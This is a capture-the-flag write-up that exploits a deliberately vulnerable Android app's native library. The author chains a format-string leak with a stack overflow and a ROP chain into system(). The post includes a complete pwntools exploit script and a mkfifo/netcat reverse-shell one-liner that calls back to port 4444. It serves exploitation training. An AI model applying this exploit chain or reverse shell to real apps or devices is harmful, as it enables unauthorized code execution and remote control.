Android Native Library Exploitation Challenge

July 12, 2023 // echel0n


Introduction

Hello guys! It's been a while. I hope you are all enjoying the summer. I had a great holiday for the first time in years. Before the holiday, I had my eye on the challenge published by Umit Aksu at mobilehackinglab.com. When I came back, I worked on this enjoyable challenge, which covers format string and stack overflow vulnerabilities.

Static Analysis of Java Code

I'm taking shortcuts here, since you already know about jadx, apktool, etc. The challenge has a single activity, which runs a server and declares external (native) functions.

  public static final int SERVERPORT = 6000;
  // External Functions from native library...
  public native String leakMemory(byte[] bArr);
  public native void overFlow(byte[] bArr, int i);
  public native String stringFromJNI();
  static {
      System.loadLibrary("native-lib");
  }

  this.output.write(MainActivity.this.leakMemory(data).getBytes("ISO_8859_1"));

The activity reads up to 1024 bytes from the remote connection, passes them to the leakMemory() function as the first parameter, and writes the returned string back to the remote side.

  mainActivity.overFlow(data, mainActivity.readBytes)

Then the data also goes into the overFlow function as the first parameter; the second parameter is the length of the data, I assume (I did not check it). Let's look at the native library.

Static Analysis of Native Library

Whenever I open something in IDA or Cutter, my CTF sense tingles. Often, I just look through the string table to see if there is something useful. This time, I found these strings;

  - You won!
  - EXPLOITSTATUS

When I checked the x-refs, I found this function (decompiled w/ rizin-ghidra);

  void printLog()(void) // 0x00018e70
  {
      int16_t var_8h;
      // printLog()
      __android_log_print(2, "EXPLOITSTATUS", "You won! ");
      return;
  }

This function takes no parameters and is not called from anywhere. So I think our goal is to return to this address somehow? idk. It would be clearer if I just went directly to the overFlow and leakMemory functions, right? (lol) Let's do the right thing and look at the first function!

MainActivity.this.leakMemory(data)

I renamed the called functions and trimmed the function a little bit;

  _data = arg1;
  _s = 0;
  uVar2 = GetByteArrayElements(_data, _var_14h, &var_49h);
  snprintf(&s, 0x28, uVar2);
  // For recall: snprintf(char *s,
  //                      size_t size,
  //                      const char *format,
  //                      ...);
  basic_string(&var_20h, &s);
  iVar1 = _data;
  uVar2 = fcn.00008fd8((int16_t)&var_8h + -0x18);
  uVar2 = NewStringUTF(iVar1, uVar2);
  basic_string_2(&var_20h);

The function passes the supplied input to snprintf as the format string, which makes it vulnerable to a format string attack. In general, this class of vulnerability can lead to arbitrary reads and writes at attacker-chosen addresses. Let's test it from our emulator then!

  generic:/ $ nc localhost 6000
  Welcome to Damn Exploitable Android App!%p %p %p %p %p %s
  0xb3332252 0x0 0xb1bac700 0x0 0x85b0400
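The probing above can be scripted. Here is a minimal sketch, assuming the service echoes the formatted string back as space-separated tokens like in the session above; the helper names build_probe and parse_leaks are mine and not part of the challenge. Keep in mind that snprintf is called with a size of 0x28, so only a few slots fit into one response.

```python
import re

def build_probe(indices):
    """Build a format string that prints the given argument slots as pointers."""
    return " ".join(f"%{i}$p" for i in indices).encode()

def parse_leaks(indices, response):
    """Map each probed slot to an integer, skipping tokens that are not hex pointers."""
    leaks = {}
    for idx, token in zip(indices, response.decode("latin-1").split()):
        if re.fullmatch(r"0x[0-9a-fA-F]+", token):
            leaks[idx] = int(token, 16)
    return leaks

probe = build_probe([1, 2, 3])
print(probe)  # b'%1$p %2$p %3$p'
leaks = parse_leaks([1, 2, 3], b"0xb3332252 0x0 0xb1bac700")
print({slot: hex(value) for slot, value in leaks.items()})
```

Using positional specifiers (%N$p) instead of a run of plain %p keeps each request short, which matters with such a small output buffer.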

Nice! Let's find out what mainActivity.overFlow(data, mainActivity.readBytes) does.

  // trimmed ...
  _var_18h = (int32_t)arg4;
  _array_type = (int32_t)arg3;
  _var_10h = (int32_t)arg2;
  _data = (int32_t)arg1;
  uVar1 = GetByteArrayElements(_data, _array_type, &uStack_19);
  _cp(uVar1, _var_18h);

  // What does _cp do?
  void cp(char *param_1,int param_2){
      undefined auStack_d8 [200];
      int local_10;
      char *local_c;
      local_10 = param_2;
      local_c = param_1;
      __aeabi_memclr(auStack_d8,200);
      if ((((0 < local_10) && (*local_c == '0')) && (local_c[1] == 'x')) &&
          ((local_c[2] == 'f' && (local_c[3] == 'a')))) {
          __aeabi_memcpy(auStack_d8,local_c,local_10);
      }
      return;
  }

  1) Checks that the second parameter is greater than 0
  2) Checks that the data starts with the ASCII string "0xfa"
  3) Copies the data onto the stack without checking the size against the 200-byte buffer
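To make the three checks concrete, here is a small Python model of cp(). It is only a sketch of the decompiled logic above; cp_model is a hypothetical name, and the model just reports whether the copy would happen and how many bytes would land past the 200-byte buffer.

```python
BUF_SIZE = 200   # size of auStack_d8 in the decompiled cp()
MAGIC = b"0xfa"  # four ASCII characters, not the single byte 0xfa

def cp_model(data: bytes, length: int):
    """Return (copied, bytes_past_buffer) for an input, mirroring the checks in cp()."""
    if length > 0 and data[:4] == MAGIC:
        return True, max(0, length - BUF_SIZE)
    return False, 0

print(cp_model(b"0xfa" + b"A" * 300, 304))  # (True, 104)
print(cp_model(b"AAAA" + b"A" * 300, 304))  # (False, 0)
```

The second call shows why the prefix matters: without it the memcpy never runs, no matter how long the input is.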

Let's verify this behaviour with an input that starts with "0xfa" followed by a lot of "A" characters. Logcat shows this SIGSEGV;

  07-09 03:11:59.964 23942 23942 F DEBUG : pid: 23900, tid: 23929, name: Thread-3 >>> com.example.mynativetest
  07-09 03:11:59.965 23942 23942 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x41414140
  07-09 03:11:59.965 23942 23942 F DEBUG : r0 9affff78 r1 abb8fe68 r2 00000001 r3 0000000a
  07-09 03:11:59.966 23942 23942 F DEBUG : r4 b5b7e194 r5 9b0003a8 r6 9b000178 r7 41414141
  07-09 03:11:59.966 23942 23942 F DEBUG : r8 9b000178 r9 b1bac200 sl 00000000 fp 9b000104
  07-09 03:11:59.966 23942 23942 F DEBUG : ip 40000000 sp 9b000050 lr b1d01e63 pc 41414140 cpsr 00000030
  07-09 03:11:59.976 23942 23942 F DEBUG :
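A detail in the crash log worth a quick check: r7 holds 0x41414141 but pc is 0x41414140. As far as I understand it, this is ARM interworking at work: when a value is popped into pc, bit 0 selects Thumb state and is cleared from the address itself. The sketch below models only that rule (load_pc is a hypothetical helper), and also checks the Thumb bit (bit 5) in the reported cpsr.

```python
T_BIT = 1 << 5  # Thumb state bit in the CPSR

def load_pc(value):
    """Model an interworking load into pc: bit 0 picks Thumb and is cleared in pc itself."""
    thumb = bool(value & 1)
    return value & ~1 & 0xFFFFFFFF, thumb

pc, thumb = load_pc(0x41414141)
print(hex(pc), thumb)            # 0x41414140 True
print(bool(0x00000030 & T_BIT))  # True
```

So the fault address matches a return into our "AAAA" bytes in Thumb state, which is a hint that addresses of Thumb functions should be written with bit 0 set.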

Yeah, that's pretty much it. Let's review our findings so far. What do we need for successful exploitation?

  1) Memory leaks (We can leak a bunch of memory addresses with the format string vulnerability!)
  2) Arbitrary Read/Write (We can overflow the stack and then overwrite known addresses!)
  3) IP Control (We already have it!)

Before diving deep into memory kung-fu, we also have a simpler goal. Let's try to jump to the winner function.

The Action

With the help of the beautiful plugin "peda-arm", we can easily interrupt the application and see where the library is located in memory;

  peda-arm > vmmap libnative
  Start      End        Perm Name
  0xb1cf9000 0xb1d12000 r-xp /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
  0xb1d12000 0xb1d14000 r--p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
  0xb1d14000 0xb1d15000 rw-p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
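Once the map is known, sorting addresses into regions is mechanical. A rough sketch, assuming the vmmap text format shown above; parse_vmmap and classify are hypothetical helpers. As a sample address I use the lr value from the crash log, which may come from a different run than this map, so treat the match as illustrative.

```python
VMMAP = """
Start End Perm Name
0xb1cf9000 0xb1d12000 r-xp /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
0xb1d12000 0xb1d14000 r--p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
0xb1d14000 0xb1d15000 rw-p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
"""

def parse_vmmap(text):
    """Turn vmmap output into a list of (start, end, perm, name) tuples."""
    regions = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].startswith("0x"):
            continue  # skip the header row and anything malformed
        regions.append((int(parts[0], 16), int(parts[1], 16), parts[2], parts[3]))
    return regions

def classify(addr, regions):
    """Return (perm, name, offset_in_region) for addr, or None if it is unmapped here."""
    for start, end, perm, name in regions:
        if start <= addr < end:
            return perm, name, addr - start
    return None

regions = parse_vmmap(VMMAP)
print(classify(0xB1D01E63, regions))  # lr from the crash log
print(classify(0x41414140, regions))  # None
```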

We can also manually brute-force a little bit of what-is-where with the format string vulnerability.

I picked the %26$p value, which was (also verified in another session);

  $26 := 0xa96e3398 && $26 = 0xb1be3398
  For both values above;
  In [11]: hex(0xb1bf4000 - 0xb1be3398)
  Out[11]: '0x10c68'
  In [13]: hex( 0xa96f4000 - 0xa96e3398)
  Out[13]: '0x10c68'
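The same check as a small script: if the distance between the leak and the library base is identical in every session, one leak is enough to recover the base. This sketch uses only the two sessions above; base_from_leak is a hypothetical helper, and the page-alignment test is a sanity check rather than a proof.

```python
# (leaked %26$p value, observed library base) for the two sessions above
SESSIONS = [
    (0xB1BE3398, 0xB1BF4000),
    (0xA96E3398, 0xA96F4000),
]

deltas = {base - leak for leak, base in SESSIONS}
print([hex(d) for d in deltas])  # ['0x10c68']

def base_from_leak(leak, delta=0x10C68):
    """Recover the library base from a %26$p leak; reject bases that are not page-aligned."""
    base = leak + delta
    if base & 0xFFF:
        raise ValueError(f"{hex(base)} is not page-aligned, wrong slot or offset?")
    return base

print(hex(base_from_leak(0xA96E3398)))  # 0xa96f4000
```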

So bingo! We found our first consistent gem for calculating where the library is mapped in memory. But I could not manage to print that memory region; I mean, my "arm-none-eabi-gdb" was not printing (x/i) the true assembly lines, so I searched for the bytes to be sure.

  peda-arm > searchmem "\x6f\x46" 0xa96f4000 0xa9710000 # it's: 00018e72 6f 46 mov r7,sp
  [*] Searching for 'oF' in range: 0xa96f4000 - 0xa9710000
  Found 113 results, display max 113 items:
  ....
  libnative : 0xa96fce72
  In [20]: hex( 0xa96fce72 - 0xa96f4000)
  Out[20]: '0x8e72'

Finally, do we have all the information we need for the quick win? Let's see about that. I prepared my payload like this;

  junk = b"0xfa" # it's the string that the binary looks for.
  junk += b"\x42" * 208 # with the 4-byte prefix: 212 bytes, i.e. 0xd0 of locals plus the saved r7
  # 00018e6c 34 b0 add sp,#0xd0
  # 00018e6e 80 bd pop {r7,pc}
  r.sendline(junk+printlog_address)
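For reference, here is how the pieces of this payload line up, as a standalone sketch using only struct. Two things are my assumptions: the runtime offset 0x8e70 for printLog (0x18e70 in the decompiler, and the search above found 0x18e72 at runtime offset 0x8e72), and setting bit 0 of the target because the function is Thumb code. build_overflow is a hypothetical helper, not the original script.

```python
import struct

MAGIC = b"0xfa"           # prefix that cp() checks for
FRAME_LOCALS = 0xD0       # from `add sp,#0xd0` in the epilogue
PRINTLOG_OFFSET = 0x8E70  # assumption: 0x18e70 in the decompiler, 0x8e70 at runtime

def build_overflow(lib_base, filler=b"\x42"):
    """Prefix + filler reach the saved pc; then comes the little-endian target address."""
    target = (lib_base + PRINTLOG_OFFSET) | 1  # assumption: bit 0 set to stay in Thumb state
    padding = MAGIC + filler * FRAME_LOCALS    # 4 + 208 = 212 bytes: locals plus saved r7
    return padding + struct.pack("<I", target)

payload = build_overflow(0xA96F4000)
print(len(payload))        # 216
print(payload[-4:].hex())  # 71ce6fa9
```

The epilogue pops r7 first and pc second, so the last 4 filler bytes end up in r7 and the packed address ends up in pc.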


Yey! Got the easy one.

Real Deal

With the power of free memory leaks, surely we can do something better than this. To make the leaks easier to use and to figure out what the leaked values hold, I just printed out as many values as I could;

  def find_interesting_addr():
      for i in range(0, 0xff):
          response = getleak(i).decode()
          if response != "0x0" and response not in unique_leaks:
              unique_leaks.append(response)
              print(f"${i} := {response}")

And the output was something like this;

  $0 := $p
  $1 := 0xa5032252
  $3 := 0xa46a2200
  $5 := 0x8c407c00
  $8 := 0x8c409400
  $9 := 0x1fd1070
  $23 := 0x8c5ff4c0
  $24 := 0x8c5ff4bc
  $25 := 0x98d86560
  $26 := 0xa38e3398
  $27 := 0x9dbf8c5f
  $28 := 0xa789b104
  $31 := 0x12c7f160
  $32 := 0x12cac800
  $34 := 0x12c9d190
  $35 := 0x1b12c7
  ...

So I attached gdb again and looked at what they are. I made an offset list to be more consistent. The stack leak was consistent enough; it was at %23$p. The other possible offsets are;

  maybe_nativelib_base = {
      "26": 0x10CD8 - 0x98,
      "55": 0x10CD8 - 0x70, # sometimes gdb breaks the alignment, idk.
      "60": 0x10CD8,
  }
  maybe_libc_base = {
      "95": 0x56999,
      "113": 0x61079,
      "121": 0x614A5,
      "185": 0x61AE5,
  }
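These tables are meant to be tried one slot at a time until a candidate base comes out page-aligned. A minimal sketch of that loop follows, with a fake leak function standing in for the real connection; resolve_base and fake_leaks are hypothetical. The sign parameter covers both cases: the native-lib offsets are added to the leak, while the libc offsets are subtracted from it.

```python
def resolve_base(get_leak, candidates, sign=+1):
    """Try each (slot, offset) pair and return the first page-aligned base, or None."""
    for slot, offset in candidates.items():
        base = get_leak(int(slot)) + sign * offset
        if base & 0xFFF == 0:
            return base
    return None

maybe_nativelib_base = {"26": 0x10CD8 - 0x98, "55": 0x10CD8 - 0x70, "60": 0x10CD8}

# Fake session: slot 26 holds something unrelated, slot 55 holds a usable pointer.
fake_leaks = {26: 0x12345, 55: 0xA96E3398, 60: 0x0}
base = resolve_base(lambda slot: fake_leaks[slot], maybe_nativelib_base)
print(hex(base))  # 0xa96f4000
```

Page alignment is a necessary condition, not a sufficient one, so a wrong slot can still pass by accident; checking a second slot against the same base would make the result more trustworthy.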

With these leaks, we know where the stack, libc and libnative-lib are. What do we need next? Yeah, gadgets!

Unlike the previous call to printLog, we will surely need to call something more advanced, especially libc's system(). The system() function takes a single parameter, which it reads from the $r0 register. So we also need to set $r0 to an address that holds the command string. For that, we can use the gadget at +0x70470 below without any side effects;

  (libnative-lib.so/ELF/ARM)> search /1/ %pop {r0, pc}
  [INFO] Searching for gadgets: %pop {r0, pc}
  [INFO] File: libc.so
  0x0007046c: cmnmi r0, #0; pop {r0, pc};
  0x00070470: pop {r0, pc};
What are the choices to achieve getting a shell?

  1) Directly getting system("/bin/sh") is not available because of the threading.
  2) We are sandboxed, so we cannot touch other things in the filesystem.
  3) Making some memory pages executable with mprotect() and then jumping back in? (did not try it yet)
  4) We have netcat, mknod and the application's sandboxed directory, so the challenge becomes a pentest challenge (lol)

I chose the 4th one, and then created my payload like this;

  # one liner sh solution, thx to PayloadsAllTheThings!
  /system/bin/rm -f /data/data/com.example.mynativetest/f; /system/bin/mknod /data/data/com.example.mynativetest/f p;/system/bin/cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/xbin/nc localhost 4444 >/data/data/com.example.mynativetest/f

Note: Beware of the "nc localhost 4444" command. I ran "adb reverse tcp:4444 tcp:4444" to avoid networking issues, so connections to that port are handled on the host machine.

I put this shell command string onto the stack. Since I already know where the stack is, I can calculate its relative address without hesitation. Finally, our payload became something like this;

  payload = (pop_r0_pc
      + p32(remote_shell_code_addr)
      + p32(system)
      + remote_shell_code
  )

The steps are;

  0) nc -nvlp 4444 on the host machine
  1) Get libc leak (try each offset 95,113,121,185)
  2) Get stack leak (from %23$p)
  3) Send the payload

The complete exploit script;

  #!/usr/bin/env python
  from pwn import *
  import warnings
  from sys import exit

  warnings.filterwarnings("ignore", category=BytesWarning)
  context.binary = "/home/dante/dbgtmp/libnative-lib.so"
  context.arch = "arm"
  # adb -a nodaemon server start
  # adb forward tcp:6000 tcp:6000
  # adb reverse tcp:4444 tcp:4444 to get rid of routing problems
  # adb shell am start -N com.example.mynativetest/.MainActivity
  remote_shell_code = b"/system/bin/rm -f /data/data/com.example.mynativetest/f;/system/bin/mknod /data/data/com.example.mynativetest/f p;/system/bin/cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/xbin/nc localhost 4444 >/data/data/com.example.mynativetest/f\x00"
  # test with touch if the command is working
  # remote_shell_code = b"/system/bin/touch /data/data/com.example.mynativetest/exampl\x00"
  SRV = "192.168.184.1"
  PORT = 6000
  r = remote(SRV, PORT)
  native_lib = ELF("/home/dante/dbgtmp/libnative-lib.so")
  libc_lib = ELF("/home/dante/dbgtmp/libc.so")
  maybe_nativelib_base = {
      "26": 0x10CD8 - 0x98,
      "55": 0x10CD8 - 0x70,
      "60": 0x10CD8,
  }
  maybe_libc_base = {
      "95": 0x56999,
      "113": 0x61079,
      "121": 0x614A5,
      "185": 0x61AE5,
  }
  unique_leaks = list()
  # get header
  r.recvuntil("Welcome to Damn Exploitable Android App!")

  def getleak(idx):
      # leak one stack slot through the format string in leakMemory()
      r.clean(0.1)
      r.sendline(f"%{idx}$p")
      the_leak = r.recvline()[:-1]
      return the_leak

  def send_line(payload):
      log.info(f"payload := {repr(payload)}")
      r.send(payload)
      return r.recv()

  def ooverflow_to_win(payload):
      sled = b"0xfa" # it's the string that binary looks for.
      sled += b"\x41" * (208)
      sled += payload
      r.send(sled)

  def find_interesting_addr():
      for i in range(0, 120):
          response = getleak(i).decode()
          if response != "0x0" and response not in unique_leaks:
              unique_leaks.append(response)
              print(f"${i} := {response}")

  def winner():
      nativelib_base = 0xFFF
      for addr, offset in maybe_nativelib_base.items():
          response = getleak(int(addr)).decode()
          nativelib_base = int(response, 16) + offset
          if (nativelib_base & 0xFFF) == 0x0:
              break
      if (nativelib_base & 0xFFF) == 0x0:
          native_lib.address = nativelib_base
      else:
          # report the rejected candidate; native_lib.address is not set yet
          log.failure(f"Something is wrong! {hex(nativelib_base)}")
          exit(1)
      winner_function_addr = p32(native_lib.symbols["_Z8printLogv"])
      print(f"libnative-lib.so base: {hex(nativelib_base)}")
      print(f"winner_function_addr: {hex(u32(winner_function_addr))}")
      ooverflow_to_win(winner_function_addr)
      print(r.recv())

  def real_deal():
      r.can_recv()
      nativelib_base = 0xFFF
      libc_base = 0xFFF
      for addr, offset in maybe_nativelib_base.items():
          response = getleak(int(addr)).decode()
          nativelib_base = int(response, 16) + offset
          print(hex(nativelib_base))
          if (nativelib_base & 0xFFF) == 0x0:
              break
      if (nativelib_base & 0xFFF) == 0x0:
          native_lib.address = nativelib_base
      else:
          log.failure(f"Native lib base: Something is wrong! {hex(nativelib_base)}")
          exit(1)
      for addr, offset in maybe_libc_base.items():
          response = getleak(int(addr)).decode()
          libc_base = int(response, 16) - offset
          if (libc_base & 0xFFF) == 0x0:
              break
      if (libc_base & 0xFFF) == 0x0:
          libc_lib.address = libc_base
      else:
          log.failure(f"Libc lib base: Something is wrong! {hex(libc_base)}")
          print(hex(libc_base))
          exit(1)
      response = getleak(int(23)).decode()
      remote_shell_code_addr = int(response, 16) + (0x28 - 0x50)
      #bin_sh = next(libc_lib.search(b"/system/bin/sh"))
      #log.info(f"bin/sh: {hex(bin_sh)}")
      system = libc_lib.symbols["system"]
      log.info(f"libnative-lib.so base: {hex(nativelib_base)}")
      log.info(f"libc.so base: {hex(libc_base)}")
      log.info(f"system: {hex(system)}")
      log.info(f"remote_shell_code_addr: {hex(remote_shell_code_addr)}")
      pop_r0_pc = p32(libc_lib.address + 0x00070470) # 0x00070470: pop {r0, pc};
      payload = pop_r0_pc + p32(remote_shell_code_addr) + p32(system) + remote_shell_code
      ooverflow_to_win(payload)
      r.interactive()

  def main():
      # find_interesting_addr()
      # winner()
      real_deal()

  if __name__ == "__main__":
      main()



References & Links

  1) https://github.com/mobilehackinglab/damn-exploitable-android-app-public-apk/
  2) https://www.mobilehackinglab.com/blog/damn-exploitable-android-app
  3) https://azeria-labs.com/return-oriented-programming-arm32/
  4) https://infosecwriteups.com/rop-chains-on-arm-3f087a95381e
  5) https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
  6) https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html

Thank you for reading my write-up! Have a nice day absolute legends!